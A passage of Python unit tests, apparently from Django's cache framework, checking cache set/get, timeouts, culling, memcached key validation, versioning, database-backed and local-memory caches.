'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertIs(cache.delete(key), True)
self.assertIs(cache.add(key, value), True)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
self.assertIs(cache.delete(key), True)
cache.set_many(stuff)
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
self.assertIs(cache.add('binary1-add', compressed_value), True)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_returns_empty_list_on_success(self):
"""set_many() returns an empty list when all keys are inserted."""
failing_keys = cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(failing_keys, [])
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set_many({'key1': 'spam', 'key2': 'eggs', 'key3': 'ham'})
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
"""
Follow memcached's convention where a timeout greater than 30 days is
treated as an absolute expiration timestamp instead of a relative
offset (#12399).
"""
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
self.assertIs(cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1), True)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
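    # Illustrative sketch (hypothetical helper, never called by the tests):
    # the convention checked in test_long_timeout above means a memcached-style
    # backend treats any timeout above 30 days as an absolute Unix timestamp
    # rather than a relative offset.
    @staticmethod
    def _memcached_style_expiry_sketch(timeout, now):
        thirty_days = 60 * 60 * 24 * 30
        if timeout > thirty_days:
            # Already an absolute expiration timestamp.
            return timeout
        # Otherwise it is a relative offset from "now".
        return now + timeout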
def test_forever_timeout(self):
"""
        Passing None as the timeout results in a value that is cached forever.
"""
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
self.assertIs(cache.add('key2', 'ham', None), True)
self.assertEqual(cache.get('key2'), 'ham')
self.assertIs(cache.add('key1', 'new eggs', None), False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
cache.set('key5', 'belgian fries', timeout=1)
self.assertIs(cache.touch('key5', timeout=None), True)
time.sleep(2)
self.assertEqual(cache.get('key5'), 'belgian fries')
def test_zero_timeout(self):
"""
        Passing zero as the timeout results in a value that is not cached.
"""
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
self.assertIs(cache.add('key2', 'ham', 0), True)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
cache.set('key5', 'belgian fries', timeout=5)
self.assertIs(cache.touch('key5', timeout=0), True)
self.assertIsNone(cache.get('key5'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache_name, initial_count, final_count):
try:
cull_cache = caches[cull_cache_name]
except InvalidCacheBackendError:
self.skipTest("Culling isn't implemented.")
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count += 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test('cull', 50, 29)
def test_zero_cull(self):
self._perform_cull_test('zero_cull', 50, 19)
def test_cull_delete_when_store_empty(self):
try:
cull_cache = caches['cull']
except InvalidCacheBackendError:
self.skipTest("Culling isn't implemented.")
old_max_entries = cull_cache._max_entries
# Force _cull to delete on first cached record.
cull_cache._max_entries = -1
try:
cull_cache.set('force_cull_delete', 'value', 1000)
self.assertIs(cull_cache.has_key('force_cull_delete'), True)
finally:
cull_cache._max_entries = old_max_entries
def _perform_invalid_key_test(self, key, expected_warning, key_func=None):
"""
        All the built-in backends should warn (except memcached, which should
        error) on keys that would be refused by memcached. This encourages
portable caching code without making it too difficult to use production
backends with more liberal key rules. Refs #6447.
"""
        # Mimic a custom ``make_key`` method being defined, since the default
        # will never trigger the warnings below.
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = key_func or func
tests = [
('add', [key, 1]),
('get', [key]),
('set', [key, 1]),
('incr', [key]),
('decr', [key]),
('touch', [key]),
('delete', [key]),
('get_many', [[key, 'b']]),
('set_many', [{key: 1, 'b': 2}]),
('delete_many', [[key, 'b']]),
]
try:
for operation, args in tests:
with self.subTest(operation=operation):
with self.assertWarns(CacheKeyWarning) as cm:
getattr(cache, operation)(*args)
self.assertEqual(str(cm.warning), expected_warning)
finally:
cache.key_func = old_func
def test_invalid_key_characters(self):
# memcached doesn't allow whitespace or control characters in keys.
key = 'key with spaces and 清'
self._perform_invalid_key_test(key, KEY_ERRORS_WITH_MEMCACHED_MSG % key)
def test_invalid_key_length(self):
# memcached limits key length to 250.
key = ('a' * 250) + '清'
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_invalid_with_version_key_length(self):
# Custom make_key() that adds a version to the key and exceeds the
# limit.
def key_func(key, *args):
return key + ':1'
key = 'a' * 249
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key_func(key), 250)
)
self._perform_invalid_key_test(key, expected_warning, key_func=key_func)
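    # Illustrative sketch (hypothetical helper, not part of Django's API and
    # never called by the tests): one way to keep arbitrary keys
    # memcached-safe is to hash any candidate that exceeds the 250-character
    # limit or contains spaces, the two conditions the tests above warn about.
    @staticmethod
    def _memcached_safe_key_func_sketch(key, key_prefix, version):
        import hashlib
        candidate = '%s:%s:%s' % (key_prefix, version, key)
        if len(candidate) > 250 or ' ' in candidate:
            digest = hashlib.sha1(key.encode()).hexdigest()
            candidate = '%s:%s:%s' % (key_prefix, version, digest)
        return candidate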
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
self.assertIs(cache.add('answer1', 42, version=2), True)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
self.assertIs(cache.add('answer1', 37, version=2), False)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
self.assertIs(cache.add('answer1', 37, version=1), True)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
self.assertIs(caches['v2'].add('answer2', 42), True)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertIs(caches['v2'].add('answer2', 37), False)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertIs(caches['v2'].add('answer2', 37, version=1), True)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
self.assertIs(caches['v2'].add('answer3', 42, version=1), True)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
self.assertIs(caches['v2'].add('answer3', 37, version=1), False)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
self.assertIs(caches['v2'].add('answer3', 37), True)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertIs(cache.has_key('answer1'), True)
self.assertIs(cache.has_key('answer1', version=1), True)
self.assertIs(cache.has_key('answer1', version=2), False)
self.assertIs(caches['v2'].has_key('answer1'), False)
self.assertIs(caches['v2'].has_key('answer1', version=1), True)
self.assertIs(caches['v2'].has_key('answer1', version=2), False)
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
self.assertIs(cache.delete('answer1'), True)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
self.assertIs(cache.delete('answer2', version=2), True)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
self.assertIs(caches['v2'].delete('answer3'), True)
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
self.assertIs(caches['v2'].delete('answer4', version=1), True)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
self.assertEqual(cache.incr('answer1'), 38)
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
self.assertEqual(cache.decr('answer1'), 37)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
self.assertEqual(cache.incr('answer2', version=2), 43)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
self.assertEqual(cache.decr('answer2', version=2), 42)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
self.assertEqual(caches['v2'].incr('answer3'), 43)
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
self.assertEqual(caches['v2'].decr('answer3'), 42)
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
self.assertEqual(caches['v2'].incr('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
self.assertEqual(caches['v2'].decr('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
cache.set('null', None)
self.assertEqual(cache.incr_version('null'), 2)
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist', version=2)
cache.set('null', None, version=2)
self.assertEqual(cache.decr_version('null', version=2), 1)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
fetch_middleware = FetchFromCacheMiddleware(empty_response)
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
content = 'Testing cookie serialization.'
def get_response(req):
response = HttpResponse(content)
response.set_cookie('foo', 'bar')
return response
update_middleware = UpdateCacheMiddleware(get_response)
update_middleware.cache = cache
response = update_middleware(request)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
UpdateCacheMiddleware(lambda req: get_cache_data)(request)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
self.assertIsNone(cache.get_or_set('null', None))
# Previous get_or_set() stores None in the cache.
self.assertIsNone(cache.get('null', 'default'))
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value')
self.assertIsNone(cache.get_or_set('null', lambda: None))
# Previous get_or_set() stores None in the cache.
self.assertIsNone(cache.get('null', 'default'))
def test_get_or_set_version(self):
msg = "get_or_set() missing 1 required positional argument: 'default'"
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian')
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
def test_get_or_set_racing(self):
with mock.patch('%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')) as cache_add:
# Simulate cache.add() failing to add a value. In that case, the
# default value should be returned.
cache_add.return_value = False
self.assertEqual(cache.get_or_set('key', 'default'), 'default')
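# Database cache backend tests. setUp() creates the cache table with the
# createcachetable management command and tearDown() drops it again, so each
# test starts with an empty table.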
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
        # The super call needs to happen first for the settings override.
super().setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super().tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_get_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2})
cache.set('expired', 'expired', 0.01)
with self.assertNumQueries(1):
self.assertEqual(cache.get_many(['a', 'b']), {'a': 1, 'b': 2})
time.sleep(0.02)
with self.assertNumQueries(2):
self.assertEqual(cache.get_many(['a', 'b', 'expired']), {'a': 1, 'b': 2})
def test_delete_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2, 'c': 3})
with self.assertNumQueries(1):
cache.delete_many(['a', 'b', 'c'])
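    # Culling the DB cache should issue only a single COUNT query, even when
    # _max_entries forces a cull on the very first set().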
def test_cull_count_queries(self):
old_max_entries = cache._max_entries
# Force _cull to delete on first cached record.
cache._max_entries = -1
with CaptureQueriesContext(connection) as captured_queries:
try:
cache.set('force_cull', 'value', 1000)
finally:
cache._max_entries = old_max_entries
num_count_queries = sum('COUNT' in query['sql'] for query in captured_queries)
self.assertEqual(num_count_queries, 1)
def test_delete_cursor_rowcount(self):
"""
The rowcount attribute should not be checked on a closed cursor.
"""
class MockedCursorWrapper(CursorWrapper):
is_closed = False
def close(self):
self.cursor.close()
self.is_closed = True
@property
def rowcount(self):
if self.is_closed:
raise Exception('Cursor is closed.')
return self.cursor.rowcount
cache.set_many({'a': 1, 'b': 2})
with mock.patch('django.db.backends.utils.CursorWrapper', MockedCursorWrapper):
self.assertIs(cache.delete('a'), True)
def test_zero_cull(self):
self._perform_cull_test('zero_cull', 50, 18)
def test_second_call_doesnt_crash(self):
out = io.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = io.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = io.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter:
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
databases = {'default', 'other'}
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable', database='default', verbosity=0)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable', database='other', verbosity=0)
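# Helper whose __getstate__ records whether the locmem cache's lock was held
# while pickling, used to verify that pickling happens outside the lock.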
class PicklingSideEffect:
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
self.locked = self.cache._lock.locked()
return {}
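# Decorator capping the locmem caches at MAX_ENTRIES=9, used by the LRU
# culling tests below.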
limit_locmem_entries = override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
OPTIONS={'MAX_ENTRIES': 9},
))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super().setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
self.assertIs(cache.add('add', bad_obj), True)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
self.assertEqual(cache.incr(key), 2)
self.assertEqual(expire, cache._expire_info[_key])
self.assertEqual(cache.decr(key), 1)
self.assertEqual(expire, cache._expire_info[_key])
@limit_locmem_entries
def test_lru_get(self):
"""get() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
@limit_locmem_entries
def test_lru_set(self):
"""set() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(3, 9):
cache.set(key, key, timeout=None)
cache.set(9, 9, timeout=None)
for key in range(3, 10):
self.assertEqual(cache.get(key), key)
for key in range(3):
self.assertIsNone(cache.get(key))
@limit_locmem_entries
def test_lru_incr(self):
"""incr() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
self.assertEqual(cache.incr(key), key + 1)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key + 1)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
# memcached and redis backends aren't guaranteed to be available.
# To check the backends, the test settings file will need to contain at least
# one cache backend setting that points at your cache server.
configured_caches = {}
for _cache_params in settings.CACHES.values():
configured_caches[_cache_params['BACKEND']] = _cache_params
PyLibMCCache_params = configured_caches.get('django.core.cache.backends.memcached.PyLibMCCache')
PyMemcacheCache_params = configured_caches.get('django.core.cache.backends.memcached.PyMemcacheCache')
# The memcached backends don't support cull-related options like `MAX_ENTRIES`.
memcached_excluded_caches = {'cull', 'zero_cull'}
RedisCache_params = configured_caches.get('django.core.cache.backends.redis.RedisCache')
# The redis backend does not support cull-related options like `MAX_ENTRIES`.
redis_excluded_caches = {'cull', 'zero_cull'}
class BaseMemcachedTests(BaseCacheTests):
# By default it's assumed that the client doesn't clean up connections
# properly, in which case the backend must do so after each request.
should_disconnect_on_close = True
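    # LOCATION may be a list of servers or a single string using ';' or ',' as
    # a separator; all three forms must parse to the same server list.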
def test_location_multiple_servers(self):
locations = [
['server1.tld', 'server2:11211'],
'server1.tld;server2:11211',
'server1.tld,server2:11211',
]
for location in locations:
with self.subTest(location=location):
params = {'BACKEND': self.base_params['BACKEND'], 'LOCATION': location}
with self.settings(CACHES={'default': params}):
self.assertEqual(cache._servers, ['server1.tld', 'server2:11211'])
def _perform_invalid_key_test(self, key, expected_warning):
"""
